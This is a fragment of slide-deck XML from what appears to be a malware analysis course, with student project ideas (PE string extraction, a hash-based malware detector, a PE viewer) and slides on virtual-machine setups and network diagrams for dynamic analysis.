                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Network-based indicators?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-190500" lvl="2" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="280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6"/>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Project idea</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p46"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Write a piece of code to detect and display strings of a PE file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write a simple signature-based malware detector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Signatures: md5, sha-1, sha-256</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write a simple PEView program</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/previous-versions/ms809762(v=msdn.10)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/quangngoc430/PeFile-View</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Write a piece of code to construct a block chain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="002060"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write a simple program for Surface Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="30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7"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p47"/>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Environment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>VMWare</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Parallels</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Virtual PC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>QEMU</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3059911" y="1966697"/>
            <a:ext cx="5256584" cy="3825368"/>
            <a:chOff x="3131840" y="2627968"/>
            <a:chExt cx="5256584" cy="3825368"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="473" name="Google Shape;473;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2996952"/>
              <a:ext cx="5256584" cy="3456384"/>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4" name="Google Shape;474;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3491880" y="3284984"/>
              <a:ext cx="1368152" cy="72008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App.</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="475" name="Google Shape;475;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462288" y="4365104"/>
              <a:ext cx="1368152" cy="72008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App.</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="476" name="Google Shape;476;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3462288" y="5373216"/>
              <a:ext cx="1368152" cy="72008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App.</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="477" name="Google Shape;477;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6084168" y="3645024"/>
              <a:ext cx="2160240" cy="2448272"/>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 name="Google Shape;478;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6480212" y="3861048"/>
              <a:ext cx="1368152" cy="72008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App.</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="479" name="Google Shape;479;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6480212" y="4754286"/>
              <a:ext cx="1368152" cy="72008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App.</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="480" name="Google Shape;480;p47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701948" y="5607399"/>
              <a:ext cx="10958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Guest OS </a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="481" name="Google Shape;481;p47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538757" y="6074374"/>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OS</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="482" name="Google Shape;482;p47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6232204" y="3251548"/>
              <a:ext cx="17011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chemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Virtual machine</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="483" name="Google Shape;483;p47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5256874" y="2627968"/>
              <a:ext cx="18159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chemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Physical machine</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>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8"/>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Dynamic Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p48"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="816315" y="1495768"/>
            <a:ext cx="5688632" cy="1008112"/>
            <a:chOff x="971600" y="1873131"/>
            <a:chExt cx="5688632" cy="1008112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="492" name="Google Shape;492;p48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004048" y="1873131"/>
              <a:ext cx="1656184" cy="1008112"/>
            </a:xfrm>
            <a:prstGeom prst="cloud">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External Network</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="493" name="Google Shape;493;p48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="1916832"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="494" name="Google Shape;494;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>
                <a:ext cx="1296144" cy="792088"/>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5" name="Google Shape;495;p48"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="971600" y="1948191"/>
                <a:ext cx="165618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Virtual Machine</a:t>
                </a:r>
                <a:endParaRPr sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="496" name="Google Shape;496;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="2420888"/>
                <a:ext cx="432048" cy="288032"/>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lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="497" name="Google Shape;497;p48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="1916832"/>
              <a:ext cx="1296144" cy="792088"/>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8" name="Google Shape;498;p48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3059832" y="1948191"/>
              <a:ext cx="165618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Physical Machine</a:t>
              </a:r>
              <a:endParaRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="499" name="Google Shape;499;p48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3995938" y="2420888"/>
              <a:ext cx="432048" cy="288032"/>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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>NIC</a:t>
              </a:r>
              <a:endParaRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="500" name="Google Shape;500;p48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2420888"/>
              <a:ext cx="432048" cy="288032"/>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lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>NIC</a:t>
              </a:r>
              <a:endParaRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="501" name="Google Shape;501;p48"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="496" idx="3"/>
              <a:endCxn id="500" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2339754" y="2564904"/>
              <a:ext cx="792000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="502" name="Google Shape;502;p48"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="499" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4427986" y="2564904"/>
              <a:ext cx="576000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:srgbClr val="4A7DBA"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="sm" w="sm" type="none"/>
              <a:tailEnd len="sm" w="sm" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="503" name="Google Shape;503;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="827584" y="3399167"/>
            <a:ext cx="3600400" cy="3171404"/>
            <a:chOff x="971600" y="3281932"/>
            <a:chExt cx="3600400" cy="3171404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="504" name="Google Shape;504;p48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="4480813"/>
              <a:ext cx="1656184" cy="792088"/>
              <a:chOff x="971600" y="1916832"/>
              <a:chExt cx="1656184" cy="792088"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="505" name="Google Shape;505;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="1916832"/>
                <a:ext cx="1296144" cy="792088"/>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6" name="Google Shape;506;p48"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="971600" y="1948191"/>
                <a:ext cx="165618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Virtual Machine</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Service</a:t>
                </a:r>
                <a:endParaRPr sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="507" name="Google Shape;507;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1907706" y="2420888"/>
                <a:ext cx="432048" cy="288032"/>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lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NIC</a:t>
                </a:r>
                <a:endParaRPr sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="508" name="Google Shape;508;p48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="3281932"/>
              <a:ext cx="3600400" cy="1008112"/>
              <a:chOff x="971600" y="3281932"/>
              <a:chExt cx="3600400" cy="1008112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="509" name="Google Shape;509;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2915816" y="3281932"/>
                <a:ext cx="1656184" cy="1008112"/>
              </a:xfrm>
              <a:prstGeom prst="cloud">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External Network</a:t>
                </a:r>
                <a:endParaRPr sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="510" name="Google Shape;510;p48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1043608" y="3325633"/>
                <a:ext cx="1296144" cy="792088"/>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1" name="Google Shape;511;p48"/>
              <p:cNvSpPr txBox="1"/>
